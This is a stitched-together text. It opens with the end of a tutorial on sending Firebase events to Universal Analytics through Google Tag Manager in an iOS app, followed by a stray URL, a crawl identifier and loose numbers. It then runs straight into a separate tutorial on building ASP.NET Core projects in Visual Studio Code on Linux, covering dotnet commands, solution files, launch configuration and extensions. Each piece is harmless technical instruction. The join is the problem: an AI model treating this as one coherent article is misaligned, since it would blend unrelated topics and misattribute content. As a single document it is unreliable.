Keep Suggested Firebase Parameter checked, and choose item_id from the Event Parameter list.
Give the variable a name, e.g.
{{item_id}} and then click Save.
Back in the tag, check Enable overriding settings in this tag, and add the Google Analytics tracking code for the web property that will be receiving these hits (
UA-XXXXXX-Y).
Finally, click the Triggering panel to add a new trigger.
Click the blue plus (+) sign in the top right corner to create a new trigger.
Choose Custom as the trigger type.
Check Some Events under the This trigger fires on heading.
Set the condition to:
Event Name equals
select_content
Give the trigger a name (e.g.
select_content), and when happy with it, click Save.
Double-check to make sure your tag looks like the one below, and then click Save to return to the Google Tag Manager dashboard.
At this point, you are ready to publish the container, so click Submit in the top right corner, and then Publish in the overlay that opens.
Once the container has been published, you should see a version overview of the published version. Click the Download button in this screen to download the container JSON file.
Now, create a new folder named container in the root of your project (the directory with the
.xcodeproj and
.xcworkspace files as well as the
Podfile). Move the container JSON into this directory.
Next, open Xcode. With your project root selected in the navigator, choose File –> Add files to Your Project.
Find and select the container folder from your project root directory, and make sure the other options are checked as in the screenshot below. Click Add when ready.
Once ready, you can run your application, and it should load the default container you just added to the application, and then shortly after fetch the most recent container version over the network.
Note! It’s always a good idea to keep as fresh a container version as the default container stored with the application itself. Thus if there’s network lag impacting the fetch of a more recent container version, the fallback (the default container) would be as up-to-date as possible.
To be sure, you’ll need to debug the setup a little.
Step 7: Debug and test that Universal Analytics receives the hits
Xcode’s logs are a bit of a mess. However, if you’re not averse to scroll-and-search, you can find what you’re looking for. You can also type in text in the filter field to parse the logs, but it only returns matching rows and is not thus very helpful.
However, we can quickly see that Google Tag Manager found our container and was able to load it in the application,
In addition to that, by scrolling down we can see that a Universal Analytics hit was dispatched via Google Tag Manager, using the parameters we set for the
select_content event.
Finally, we can check the Real Time report of our mobile app view to confirm data is flowing in:
Debugging a mobile application is notoriously difficult. If you want to do it seriously, you might want to use a tool like Charles proxy, which creates a log stream of all the network requests dispatched by your mobile application. You don’t even need source code access to make it work!
Summary
As with my Android guide, this article should really be an introduction to iOS development, and not a full-blown tutorial.
The purpose is to give you the tools and confidence to start working with mobile app development. Understanding the capabilities and limitations of Firebase is fundamental to being able to fluently work with the ecosystem.
Working with mobile application development is far removed from web development. For starters, the IDEs, SDKs, and programming languages at your disposal are far more restrictive than the wild west that is the web browser.
Kotlin and Swift do not let you do all the crazy stuff you can do with JavaScript, and there are also restrictions what types of shenanigans can be executed at runtime (so no Custom HTML tags in mobile app containers).
Nevertheless, iOS development has its charms, and Xcode can be a great ally in the times when it’s not a complete pain in the butt.
The beauty of mobile application development is how quickly you can get started. You don’t need anything extravagant - just a machine capable of handling the virtual devices, some good tutorials, and a solid system such as Firebase picking up some of the slack.
As always, I’m looking forward to your feedback in the comments! I’m sure I’ll revisit Firebase many times in upcoming articles.
|
https://www.simoahava.com/amp/analytics/ios-quickstart-google-analytics-firebase-tag-manager/
|
CC-MAIN-2022-05
|
refinedweb
| 2,971
| 63.19
|
I am trying to write an SSL client that sends mail using the javax.mail API. The problem I am having is that the server request that I use SSL, but the server is also configured with a non-standard SSL certificate. The web pages I have found say that I need to install the certificate into the trust store. I don't want to do that (I don't have the necessary permissions.)
You need to create a fake TrustManager that accepts all certificates, and register it as a manager. Something like this:
public class MyManager implements com.sun.net.ssl.X509TrustManager { public boolean isClientTrusted(X509Certificate[] chain) { return true; } public boolean isHostTrusted(X509Certificate[] chain) { return true; } ... } com.sun.net.ssl.TrustManager[] managers = new com.sun.net.ssl.TrustManager[] {new MyManager()}; com.sun.net.ssl.SSLContext.getInstance("SSL"). .init(null, managers, new SecureRandom());
|
https://codedump.io/share/wrqaIUPLzm9l/1/is-it-possible-to-get-java-to-ignore-the-quottrust-storequot-and-just-accept-whatever-ssl-certificate-it-gets
|
CC-MAIN-2016-50
|
refinedweb
| 143
| 51.04
|
Hi Everyone
I've just started a C++ programming class and I need to write a program to total up one day's worth of bank activity with a small percentage, but I don't know where to even start. Here's the problem summary:
The Silly Savings and Loan Company just opened up with a cash balance of $1000, and a plan to get rich. Their plan to make money is simple. They will charge no fee for checks, and a 3% fee for all deposits. You will write a program for them. They will run your program and enter deposits as positive numbers, and checks as negative numbers. All transactions will be recorded in the order they happen. When they run out of things to enter at the end of the day, they will enter a value of 0 to stop the program.
The program needs to add up both sets of numbers (deposits and checks) and figure out the amount of cash they should have at the end of the day. For every deposit, the 3% fee will be removed from the amount actually deposited, that amount will be added in to the profit they expect to make.
Once the data entry has been completed, the program will print out the total amount of checks written (as a positive number), the total amount of deposits received, the amount of cash they should have on hand, and the total profit earned that day.
Here are the transactions for their first day of operation:
Deposit 100.00
Check 500.00
Deposit 250.00
Deposit 25.00
Check 75.50
Deposit 27.50
Check 775.27
I started some code with the help of a friend, but I don't think it is correct. Can someone help me?
Here is was I had written before, thought I don't really understand what I have done.
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
double 0.0;
double fee;
double checks;
double deposits;
double balance;
double balance = balance + checks+ deposists;
cout << "balance: ";
cin >> checks, depsits
system("PAUSE");
return 0;
}
Please! Any help would be greatly appreciated
View Tag Cloud
Forum Rules
|
http://forums.codeguru.com/showthread.php?516816-Simple-Bank-Code-Problem&p=2035870&mode=threaded
|
CC-MAIN-2014-42
|
refinedweb
| 365
| 82.14
|
On Thu, 2 Sep 2010, Jeremy Fitzhardinge wrote:> On 08/30/2010 04:20 AM, Stefano Stabellini wrote:> > Hi all,> > this.> > This series is based on Konrad's pcifront series (not upstream yet):> >> >> >> > and requires a patch to xen and a patch to qemu-xen (just sent to> > xen-devel).> > My only concern with this series is the pirq remapping stuff. Why do> pirq and irq need to be non-identical? Is it because pirq is a global> namespace, and dom0 has already assigned it?>> Why do guests need to know about max pirq? Would it be better to make> Xen use a more dynamic structure for pirqs so that any arbitrary value> can be used?> No, pirq is a per-domain namespace, but pirq and irq are conceptuallydifferent: pirqs are used by xen as a reference for interrupts ofdevices assigned to the guest, while linux uses irqs for itsinternal purposes.The pirq namespace is chosen by xen while the linux irq namespace ischosen by linux.Linux is allowed to choose the pirq number it wants when mapping aninterrupt, this is why linux needs to know the max pirq, so that it cansafely chose a pirq that is in the allowed range.The difference between pirqs and linux irqs increases when we talk aboutPV on HVM guests: in this case qemu also maps interrupts in the guestsgetting pirqs in return, so the linux kernel has to be able to cope withalready assigned pirq numbers.The current PHYSDEVOP_map_pirq interface is already flexible enough forthat because it provides the possibility for the caller to let xenchoose the pirq, something that linux never does in the pure PV case,but it is still possible. Obviously if you let xen choose the pirqnumber you are safe from conflicts but you must be able to cope withpirq numbers different from linux irq numbers.
|
http://lkml.org/lkml/2010/9/3/265
|
CC-MAIN-2015-22
|
refinedweb
| 308
| 65.35
|
Bart De Smet's on-line blog (0x2B | ~0x2B, that's the question)
Recently I delivered a talk at TechEd South Africa on “Custom LINQ Providers”. This is a very broad topic to cover in barely 60 minutes especially if one has to explain pretty “abstract” pieces of art like IQueryable<T>. Apparently I managed to do so looking at the scores <g>. But why is IQueryable<T> such a special specimen? This post will explain why.
Well, not that much: I and Queryable. “I” means there’s work to do if you want to use it – that’s precisely what interfaces are all about (the Imperative form of to Implement). “Queryable” is the promise of the interface – what we’ll get in return for the “I” labor.
So, what would you guess that needs to be implemented to get query capabilities in return? A blind guess would be: every query operator? Looking at all of the query operators we support with all their fancy overloads, that would mean 126 methods. Framework designers are sometimes masochistic but to such a large extent? Nah! There’s a magic threshold for interfaces which I would conservatively set to 10 methods. If you go beyond that threshold, only masochistic framework users will care to (try to) implement your interface. People have come up with brilliant (hmm) ideas to reduce the burden of interface implementation by trading the problem for another set of problems: abstract base classes. Right, we only have 47 distinct query operators and additional overloads can do with a default implementation in quite some cases, but still 47 abstract methods is way too much especially if most implementors will only be interested in a few of them, so you get a sparse minestrone soup with floating NotImplementedExceptions everywhere. And you’re facing the restrictions of the runtime with respect to single inheritance only, which is one of the reasons I don’t believe that much in abstract base classes as extensibility points (although there are cases where these work great).
We need something better. What about the silver bullet (hmm) to all complexity problems: refactoring? Oh yeah, we could have 47 interfaces each with a few methods (all having the same name since they would be overloads) with exciting names like IWhereable, ISelectable, IOrderable, IGroupable, etc. If it doesn’t scale against one axis, what about pivoting the whole problem and make it again not scale against the orthogonal axis? We’ve gained nothing really. Maybe there’s yet a better idea.
Time to step back a little. Remember the original promise of the interface? You implement me and I give you something with “queryable” characteristics in return. However, for ages the typical way of delivering on such a promise was symmetric to the implementation. It was really all about: “I know – but only abstractly – how to use something but only if you concretize that something for me.”. Hence interfaces for say serialization have predictable members like Serialize and Deserialize. And yes, the interface delivers on its promise of marking something that can do serialization as such but in a rather lame and predictable way. So what if we could deliver on the “queryable” promise without putting the burden of implementing all query operators directly on the implementor? This is where interfaces can also be “asymmetric” concerning their promise versus their implementation cost. (If I were in a really philosophical mood, I could start derailing the conversation introducing parallels with concave, convex and regular mirrors. Let’s not do this.) But how…?
In order to have useful query capabilities we really need two things:
From the latter promise we can already infer that IQueryable<T> ought to implement IEnumerable<T>, which makes our outstanding balance for the “implementor frustration threshold” (IFT for acronym lovers) two: a generic and non-generic equivalent of GetEnumerator:
interface IQueryable<T> : IEnumerable<T> { }
interface IQueryable<T> : IEnumerable<T> { }
For the former promise we already came to the conclusion that it would be unreasonable to require 47 methods or so to be implemented (btw, that would also mean that in subsequent releases of LINQ, new query operators would have to go in an IQueryable2<T> interface since interfaces do not scale well on the versioning axis – remember COM?). So what if we could do all the heavy lifting for you, just giving you one piece of information that represents an entire query. That’s what expression trees are capable of doing. Now we end up with one more member to IQueryable<T>:
interface IQueryable<T> : IEnumerable<T> { Expression Expression { get; } }
interface IQueryable<T> : IEnumerable<T> { Expression Expression { get; } }
Conceptually, we could stop here. You have an expression tree that can represent an entire query (but how does it get there?) and you have a method that demands (where lazy becomes eager) you to start iterating over the results. The two query capability requirements have been fulfilled. Oh, and it’s quite predictable how the GetEnumerator would work, right? Take the expression tree, translate it into a Domain Specific Query Language (DSQL if you will), optionally cache it, send it to whatever data store you’re about to query, fetch the results, new up objects and yield them back.
I already raised the question about where the expression tree property’s value comes from. The answer is we need a bit of collaboration from you, the implementor, through a property called QueryProvider:
interface IQueryable<T> : IEnumerable<T> { Expression Expression { get; } IQueryProvider QueryProvider { get; } }
An IQueryProvider is an object that knows how to create IQueryable objects, much like a factory. However, at certain points in time we’ll want you to do a different thing: instead of creating a new IQueryable, we might want you to execute a query on request (for example when you’re applying the First() query operator, eager evaluation results and we’ll need a way to kindly ask you for the value returned by the query):
interface IQueryProvider { IQueryable<T> CreateQuery<T>(Expression ex); T Execute<T>(Expression ex); }
interface IQueryProvider { IQueryable<T> CreateQuery<T>(Expression ex); T Execute<T>(Expression ex); }
How lame you might think: it’s just asking me to create the IQueryable<T> on LINQ’s behalf. Yes, but you can carry out whatever tricks you need (such as propagating some connection information needed to connect to a database) inside the CreateQuery implementation. Oh, and both methods above have non-generic counterparts.
In addition to the two properties and two methods above, there’s one last property I should mention for completeness: ElementType. The idea of this property is to expose the type of the entities being queried. Why do we need this? Is IQueryable<T> not telling enough, namely T? Indeed, there’s even such a remark in the MSDN documentation:
The ElementType property represents the "T" in IQueryable<T> or IQueryable(Of T).
The ElementType property represents the "T" in IQueryable<T> or IQueryable(Of T).
The reason we still have ElementType is for non-generic cases. For example, you might want to target a data store that doesn’t have an extensible schema, so you don’t need a generic parameter ‘T’. Instead, the type of the data returned by the provider is baked in, and ElementType is the way to retrieve that underlying type.
Finally, we end up with the following definition of IQueryable<T>:
interface IQueryable<T> : IEnumerable<T> { Expression Expression { get; } IQueryProvider QueryProvider { get; } Type ElementType { get; } }
interface IQueryable<T> : IEnumerable<T> { Expression Expression { get; } IQueryProvider QueryProvider { get; } Type ElementType { get; } }
All of this might still look fancy, so let’s turn to the consumer side to clarify things. That’s were the asymmetry becomes really apparent.
Let’s assume for a minute we have some Table<T> class that implements IQueryable<T>:
var products = new Table<Product>();
var products = new Table<Product>();
Given our derived interface definition for IQueryable<T> we don’t really get much “query capabilities”, do we? Right, we can ask this instance for things like ElementType (which really will be typeof(T)) and fairly abstract notions of Expression and QueryProvider. But no way we have query operators such a Where and Select available already. However, as you’ll know by know, LINQ relies on such operators. Indeed, take a look at the following query:
var products = new Table<Product>(); var res = from p in products where p.Price > 100 select p.Name;
var products = new Table<Product>(); var res = from p in products where p.Price > 100 select p.Name;
The way this gets translated by the compiler looks as follows:
Table<Product> products = new Table<Product>(); var res = products.Where(p => p.Price > 100).Select(p => p.Name);
Table<Product> products = new Table<Product>(); var res = products.Where(p => p.Price > 100).Select(p => p.Name);
but where’s the Where? The answer lies in extension methods of course. Once we have System.Linq in scope, a (static) class called Queryable is in reach which exposes extension methods for IQueryable<T>. This is precisely why IQueryable<T> deserves the title of “funny interface” since it’s most likely the first interface that has been designed with a split view in mind. On the one hand, there’s the real “interface interface”, i.e. in CLR terms. But on top of that, extension methods provide the really useful interface functionality and act virtually as default method implementations in interfaces. That is, you don’t need to implement a whole bunch of query operator methods to get their functionality.
So, how do those methods work? Before going there, what about refreshing our mind on the LINQ to Objects implementation of those operators, as defined in System.Linq.Enumerable as extension methods on IEnumerable<T>. Just to pick one, consider Where:
static IEnumerable<T> Where<T>(this IEnumerable<T> source, Func<T, bool> predicate) { foreach (T item in source) if (predicate(item)) yield return item; }
static IEnumerable<T> Where<T>(this IEnumerable<T> source, Func<T, bool> predicate) { foreach (T item in source) if (predicate(item)) yield return item; }
Note: I’ve omitted the (a little tricky to implement – why?) exception throwing code in case source or predicate are null; this is left as an exercise for the reader. Solutions can be found in.
Besides client-side execution using iterators, there are a few important things to notice. First, here we’re extending on IEnumerable<T>. Although IQueryable<T> implements IEnumerable<T>, LINQ to Objects operators won’t be used when applying query operators on an IQueryable<T> data source because the latter type is more specific. If one wants to switch to LINQ to Objects semantics, AsEnumerable<T>() can be called. The second important thing is the type of the second parameter (on the call side this will look like the first and only parameter because we’re looking at an extension method). It’s just a Func<T, bool>, which is a delegate. This triggers the compiler to create an anonymous method:
IEnumerable<Product> products = new List<Product>(); IEnumerable<string> res = products.Where(delegate (Product p) { return p.Price > 100; }).Select(delegate (Product p) { return p.Name; });
Now, switch to the IQueryable<T> counterpart defined in System.Linq.Queryable, ignoring the implementation for a second:
static IQueryable<T> Where<T>(this IQueryable<T> source, Expression<Func<T, bool>> predicate)
Obviously the return type and first parameter type are different, but more importantly is the different type for the predicate parameter. This time it’s an Expression<…> of that same delegate Func<T, bool> type. When the compiler tries to assign a lambda expression to such an Expression<T> it emits code to create an expression tree, representing the lambda’s semantics, at runtime:
IQueryable<Product> products = new Table<Product>(); ParameterExpression p = Expression.Parameter(typeof(Product), “p”); LambdaExpression <>__predicate = Expression.Lambda(Expression.Greater(Expression.Property(p, “Price”), Expression.Constant(100)), p); LambdaExpression <>__projection = Expression.Lambda(Expression.Property(p, “Name”), p); var res = products.Where(<>__predicate).Select(<>__projection);
So, we can already see how a LINQ query ends up as a chain of query operator method calls that are all implemented as extension methods on IQueryable<T> and take in their “function parameter” as an expression tree, so that interpretation and translation can be deferred till runtime. Indeed, an expression tree representing p => p.Price > 100 can easily be translated into a WHERE clause in SQL or whatever equivalent in another DSQL.
Remaining question is how System.Linq.Queryable.* methods are implemented. Obviously no iterators, there’s nothing that can be done client-side. Instead we want to end up with a giant expression tree representing a query, originating from a chain of query operator method calls:
products.Where(<>__predicate).Select(<>__projection)
products.Where(<>__predicate).Select(<>__projection)
The query above contains no less than 5 ingredients:
After executing the line of code above, we get an IQueryable<string> in return (a string because the projection maps the Product objects onto strings using p.Name), one that should contain all of the information outlined above. Breaking this down, products is an IQueryable<Product> and hence it has an Expression property representing point ‘1’ above – data about the query source. When applying Where to this, we take all existing query information (from the “left hand side of the .”) through the Expression property and add the knowledge we’re about to apply Where with a given predicate (point ‘2’ above), resulting in a new IQueryable<Product>. Finally, Select is applied, again taking the original information via the Expression property, extending it with “Select some projection”, resulting in a new IQueryable<string> in this case. To wrap up this sample, the code above creates no less than three distinct IQueryable<T> instances (that is, including “products” in this count).
A picture is worth a thousand words:
Inside the implementation of Where<T>, we:
Subsequent query operator calls, e.g. to Select<T,R>, will continue this process of taking the original query expression and building a new one out of it by extending it with information about the query operator and its arguments (e.g. the projection lambda expression).
Quite often, the recommendation for using extension methods is to use them only to “extend” (sealed) classes with helper methods, if you don’t have a way to extend those yourself. In other words, if you’re the owner of a class, you should consider extending the class’s functionality rather than using extension methods are your primary extension mechanism. This recommendation is absolutely correct. However, when dealing with (what I refer to as) “asymmetric” interfaces, extension methods offer an interesting – albeit advanced – capability to separate the bare minimum extensibility points (the real “CLR interface”) from the offered functionality (brought in scope – or “woven in” – through extension methods via a namespace import) to reduce the tension between interface creator and implementor. In this post, you’ve seen one of the pioneers employing this technique: IQueryable<T>. Before you even consider following this technique, think about all the options you have: pure interfaces (keeping the “implementor frustration threshold” in mind), abstract base classes (keeping the single inheritance restriction in mind) and extension method based interface asymmetry.
Enjoy!
Pingback from Dew Drop - August 16, 2008 | Alvin Ashcraft's Morning Dew
In the Programming Microsoft LINQ book we dedicated two whole chapters (76 pages) about the writing of
Pingback from Reflective Perspective - Chris Alcock » The Morning Brew #160
Pingback from User links about "grab" on iLinkShare
Pingback from WMOC#16 - Continuations, Currying and Recursion - Service Endpoint
Pingback from How to Use LINQ SelectMany
Pingback from Recent Links Tagged With "schema" - JabberTags
|
http://community.bartdesmet.net/blogs/bart/archive/2008/08/15/the-most-funny-interface-of-the-year-iqueryable-lt-t-gt.aspx
|
CC-MAIN-2013-48
|
refinedweb
| 2,602
| 52.09
|
Wrangling Clojure StacktracesHow to live with Clojure's humongous stacktraces.
Clojure error messages and stacktraces are the number one most complained-about feature of Clojure. I agree they're bad. There are many levels of abstraction that the problem can exist in. For instance, it could be a reader error (syntax error), a type error (expecting a different type), an argument order/number error, etc. I wish I had a nice analysis showing you how to identify each type of error. But I don't!
What I do have is a bunch of resources. As a major problem in the Clojure language, rest assured that a lot of energy is spent on it. There are blog posts, stack overflow questions, utilities, and major work in the language. Here are some resources:
How To Understand Clojure Stacktraces And Error Messages
Christopher Bui has written a nice guide for beginners.
Clojure Stack Traces for the Uninitiated
Connor Mendenhall gives some beginner tips for reading stacktraces.
Prone
Prone is a cool middleware for Ring applications that catch exceptions and give them to you with a nice UI in the browser. It's one of the first things I add when starting a new web project.
clj-stacktrace
This older library prints stacktraces in a better way. Clojure
functions are converted to their
namespace/name format instead of
their canonical JVM name with dollar signs, and things are aligned to
be more easily read.
Clojure Error Message Catalog
This is a project to document error messages in Clojure with their interpretations and solutions. It is similar to the Elm version.
clojure.spec
clojure.spec, due out in Clojure 1.9, promises to make a lot of error messages much better. A lot of the difficulty with error messages in Clojure is that there are macros (yet another layer of abstraction). clojure.spec gives you a way to parse macros (and other syntax) with much better error messages.
For a preview of how spec will help, check out Illuminated Macros and Improving Clojure's Error Messages with Grammars, which came out before spec but use similar solutions.
Conclusion
With spec, I am very optimistic about Clojure error messages. In the next five years, I can see them getting really good. In the meantime, Clojure error messages are just something you'll have to learn how to read.
I wish I could wave a wand and give you all of the experience needed to read error messages. Error messages are a problem in many languages and Clojure's follow that tradition 🙂
If you're interested in learning Clojure, don't be discouraged by the error message. Nor should the JVM scare you off. That's why I created the JVM Fundamentals for Clojure course. It's over five hours of video teaching lots of things from my experience with the JVM that I still use with Clojure.
That's the end of this course!
Rock on!
Eric
Get this lesson and ten more in your inbox. Sign up below.
|
https://purelyfunctional.tv/article/wrangling-clojure-stacktraces/
|
CC-MAIN-2017-39
|
refinedweb
| 503
| 65.52
|
When .Net Core came out there was a lot of excitement about the idea of developing .Net code outside of Windows.
The IDE of choice for .Net, Visual Studio, is and probably will always be a Windows-only program.
There are alternatives though, and today it is possible to fully develop an ASP.NET Core application outside of Windows.
In this blog post we will be looking into that, specifically in Linux.
Please note that all of the tooling described here is cross-platform all of this will work on any platform that supports .Net Core.
The IDE
The full version of Visual Studio is only available in Windows. However, there’s an alternative that has a somewhat confusing name: Visual Studio Code.
You might think that VS Code is an inferior version of the full Visual Studio product, but that is not the case.
VS Code is a different project altogether. It’s built using a different set of technologies and this brings some features that full VS doesn’t have, for example being easily extensible and customizable, and also less demanding in terms of resources.
VS Code offers the ability to extend its functionality by the installation of extensions. For C# you should install the C# extension. You don’t need to go through the trouble of looking for it though. When you open a project that has C#, Visual Studio Code will prompt you to install the C# extension if you don’t have it already.
In the rest of the blog post we will create a hypothetical ASP.NET Core web application in order to illustrate most of the required tasks when developing in .Net. Namely how to create projects and solutions, reference projects, install nuget packages, use dotnet tools (like entity framework) and run tests.
A Typical Project
The imaginary project we’ll be creating is a reminder application. The idea here is to describe a project with sufficient complexity that would require multiple projects that reference each other, a solution file and tests.
The solution will contain an ASP.NET Core project that could, for example, be used to see past and future reminders. A Console application so that we can create reminders from the command line (and to illustrate how we can have a solution with more than one running project) and a class library that will contain all the common logic. We’ll also add a test project to illustrate how unit tests can be run from the command line and inside VS Code.
Creating the projects and solution file
By this time you should have installed .Net Core and Visual Studio Code. You should be able to open a terminal window and type
$ dotnet
and get an output something similar to this:
Usage: dotnet [options] Usage: dotnet [path-to-application] Options: -h|--help Display help. --version Display version. path-to-application: The path to an application .dll file to execute.
One of the options of the dotnet command is “new”. To check that and other options’ help page just do
dotnet [option] --help, in this case
dotnet new --help.
That will display a list of possible project templates to choose from. For example to create an ASP.NET Core MVC project:
$ dotnet new mvc
If you run that as it is, a new MVC project will be created in the current folder, using the name of the current folder as the default namespace and project name.
You might not want that. In case you don’t, you can use the
--name and
--output options. Using
--name (or
-n) you can specify the default namespace and with
--output (or
-o) you can specify the folder name to create and where to place the project files. If you use
--name and don’t specify
--output, the output folder will implicitly take the same value as
--name.
It is probably a good idea to define the project folder structure before we continue. Here it is:
Reminders +---+ Reminders.Web +---+ Reminders.Cli +---+ Reminders.Common +---+ Reminders.Tests
First thing we need to do is to create a project folder named Reminders and then inside it do:
$ dotnet new mvc --name Reminders.Web $ dotnet new console --name Reminders.Cli $ dotnet new classlib --name Reminders.Common $ dotnet new xunit --name Reminders.Tests
This will create 4 projects, one MVC, one console, a class library and a xUnit test project.
It’s a good idea to create a solution file as well. Especially if eventually you want to open these projects in full Visual Studio, which will prompt you to create one until you eventually do it.
There are advantages in having a solution file other than avoiding full Visual Studio nagging you about creating the .sln file. If you have one you can just go to the Reminders folder and do a
dotnet build or a
dotnet restore and that build/restore all projects referenced in the .sln file.
Also, if you have a
.sln file you can open all projects in VS Code by initiating VS Code in the folder where the
.sln file is located.
Let’s create our .sln file, name it Reminders.sln and add the four projects to it (inside the Reminders folder):
$ dotnet new sln --name Reminders $ dotnet sln add Reminders.Web/Reminders.Web.csproj $ dotnet sln add Reminders.Cli/Reminders.Cli.csproj $ dotnet sln add Reminders.Common/Reminders.Common.csproj $ dotnet sln add Reminders.Tests/Reminders.Tests.csproj
Adding project references
In full Visual Studio when you want to add a reference to a project you can just right click on references and select Add Reference, pick the project you want to add and you’re done.
VS Code does not have that functionality. To do this we need to resort to the command line, but it’s just as easy. For example, let’s reference Reminders.Common in Reminders.Web, Reminders.Cli and Reminders.Tests.
Navigate to the folder where the .sln file is (Reminders) and type:
$ dotnet add Reminders.Web/Reminders.Web.csproj reference Reminders.Common/Reminders.Common.csproj $ dotnet add Reminders.Cli/Reminders.Cli.csproj reference Reminders.Common/Reminders.Common.csproj $ dotnet add Reminders.Tests/Reminders.Tests.csproj reference Reminders.Common/Reminders.Common.csproj
If you want to have a look at which other projects are referenced by a particular project you can either open the .csproj file and have a look at the
ProjectReference entries or if you want to do it from the command line:
dotnet list PathToCsProj reference.
You can also navigate to the folder where a particular project is and simply do
dotnet add reference pathToOtherProject.csprj.
Picking the startup project
Open the solution in VS Code. The easiest way to do that is to navigate to the Reminders folder (where the .sln file is) and type
code ..
When you do that you should get a message in VS Code: “Required assets to build and debug are missing from ‘Reminders’. Add them?”
Click Yes.
That will create a
.vscode folder.
In that folder there are two files:
launch.json and
tasks.json.
launch.json configures what happens when you press F5 inside VS Code.
For me the project that will run is the Reminders.Cli console project:
{ //}/Reminders.Cli/bin/Debug/netcoreapp2.0/Reminders.Cli.dll", "args": [], "cwd": "${workspaceFolder}/Reminders.Cli", // For more information about the 'console' field, see "console": "internalConsole", "stopAtEntry": false, "internalConsoleOptions": "openOnSessionStart" }, { "name": ".NET Core Attach", "type": "coreclr", "request": "attach", "processId": "${command:pickProcess}" } ] }
Also, the
tasks.json will only compile the Reminders.Cli project:
{ "version": "2.0.0", "tasks": [ { "label": "build", "command": "dotnet", "type": "process", "args": [ "build", "${workspaceFolder}/Reminders.Cli/Reminders.Cli.csproj" ], "problemMatcher": "$msCompile" } ] }
It is possible to customize these two files so that you can pick which project to run. In this case we want to be able to run either Reminders.Web or Reminders.Cli.
The first thing you should do is to remove the second item in
tasks.json‘s args array: “${workspaceFolder}/Reminders.Cli/Reminders.Cli.csproj”. We don’t need it because we have the solution file (Reminders.sln). When
dotnet build is executed in the folder that contains the sln file all the projects referenced in the solution get built.
After that we can now go to
launch.json and click the “Add Configuration…” button in the bottom left corner.
Select “.Net: Launch a local .NET Core Web Application” and in the generated json change “program” and “cwd” (current working directory) to:
"program": "${workspaceRoot}/Reminders.Web/bin/Debug/netcoreapp2.0/Reminders.Web.dll", "cwd": "${workspaceRoot}/Reminders.Web"
You can now go to the Debug “section” of Visual Studio Code and see the Web and Console app configuration there:
Note that you can change the configuration names if you like, just change the “name” property in
launch.json.
Now when you press F5 inside VS Code the project that will run is the one that is selected in the Debug section of VS Code.
This only affects VS Code though, the
dotnet run command is unaffected by these changes. In the terminal, if you navigate to the solution’s folder and type
dontet run you’ll get an error (Couldn’t find a project to run…). You need to use the
--project argument and specify the path to the csproj file you want to run, e.g.:
dotnet run --project Reminders.Web/Reminders.Web.csproj. Alternatively you can navigate to the project’s folder and execute
dontet run there.
Adding Classes and Interfaces
In full Visual Studio you have several templates available when adding new files to a project.
In VS Code the only out of the box option is to create a new file and use the VS Code snippets (e.g. typing class and then TAB).
Fortunately there’s a VS Code extension named “C# Extensions” which adds two options to the context menu on VS Code’s explorer view: “New C# Class” and “New C# Interface”.
This extension also adds the ability to generate a class’ constructor from properties, generate properties from the constructor and add read-only properties and initialize them (there are demos of this in the extension’s page).
This section wouldn’t be complete without mentioning a currently abandoned alternative named yeoman, specifically the generator-aspnet.
Yeoman is a nodejs application that allows you to install yeoman generators which generate code. For ASP.NET Core there was a particularly interesting generator named generator-aspnet.
That generator provided a set of project templates similar to what
dotnet new now offers (mvc application, console app, etc). But that was not the most interesting thing about generator-aspnet. It was its set of subgenerators.
A subgenerator in yeoman is a small generator for creating just one file, for example a class, an interface or an empty html page. Here’s an example of using generator-asp to create a new class:
yo aspnet:class ClassName
Generator-asp had loads of these:
yo aspnet:angularcontroller [options] <name> yo aspnet:angularcontrolleras [options] <name> yo aspnet:angulardirective [options] <name> yo aspnet:angularfactory [options] <name> yo aspnet:angularmodule [options] <name> yo aspnet:appsettings [options] yo aspnet:bowerjson [options] yo aspnet:class [options] <name> yo aspnet:coffeescript [options] <name> yo aspnet:dockerfile [options] yo aspnet:gitignore [options] yo aspnet:gruntfile [options] yo aspnet:gulpfile [options] <name> yo aspnet:htmlpage [options] <name> yo aspnet:interface [options] <name> yo aspnet:javascript [options] <name> yo aspnet:json [options] <name> yo aspnet:jsonschema [options] <name> yo aspnet:middleware [options] <name> yo aspnet:mvccontroller [options] <name> yo aspnet:mvcview [options] <name> yo aspnet:nuget [options] yo aspnet:packagejson [options] yo aspnet:program [options] yo aspnet:startup [options] yo aspnet:stylesheet [options] <name> yo aspnet:stylesheetless [options] <name> yo aspnet:stylesheetscss [options] <name> yo aspnet:taghelper [options] <name> yo aspnet:textfile [options] <name> yo aspnet:tfignore [options] yo aspnet:typescript [options] <name> yo aspnet:typescriptconfig [options] <name> yo aspnet:typescriptjsx [options] <name> yo aspnet:usersecrets [options] <name> yo aspnet:webapicontroller [options] <name>
Unfortunately they were removed in version 0.3.0. This list is from
From the talk on the generator-aspnet github issues, although never mentioned explicitly, it seems that dotnet new is the only way to go from now on. Unfortunately the only generation commands that are similar to these subgenerators in dotnet new are Nuget Config, Web Config, Razor Page, MVC ViewImports and MVC Viewstart (you get a list of them when you type dotnet new –help).
You can still install this specific version of generator-aspnet though (npm install [email protected]) and use it (some of the generators are still useful).
However, for creating classes the extension I mentioned previously is the easiest and most convenient to use. Let’s use it to create a Reminder class inside the Reminder.Common project.
The Reminder class has an Id property, a Description, a Date and a boolean flag IsFinished to indicate the reminder was acknowledged.
First thing you need to do is install the “C# Extensions extension”. Then right click on Reminders.Common in the explorer view and select New Class:
Name it Reminder.cs and create the three properties. In the end it should look like this:
using System; namespace Reminders.Common { public class Reminder { public int Id { get; set; } public string Description { get; set; } public DateTime Date { get; set; } public bool IsFinished { get; set; } } }
Now put the cursor on the opening “{” after class Reminders and click the light bulb and select “Initialize ctor from properties”:
You should end up with this:
using System; namespace Reminders.Common { public class Reminder { public Reminder(int id, string description, DateTime date, bool isFinished) { this.Id = id; this.Description = description; this.Date = date; this.IsFinished = isFinished; } public int Id { get; set; } public string Description { get; set; } public DateTime Date { get; set; } public bool IsFinished { get; set; } } }
Although the constructor isn’t really necessary (and it won’t play well with Entity Framework if you are planning to use it) , it’s just an example of some nice features you get from the extension. Also, when defining properties you can use the same snippets that are available in full Visual Studio (i.e. type prop and press TAB).
Razor views
Razor pages (.cshtml) is definitely an area where VS Code is lacking. There’s no intellisense or even auto-indent.
There’s an extension in the marketplace named ASP.NET Helper which will get you intellisense, however you have to import the namespaces for your models in
_ViewImports.chtml (the extension’s requirements are at the bottom of the extensions page). Also in its current version it only seems to work if the model you use is in the same project as the view.
This extension can be useful in some situations but it’s very limited.
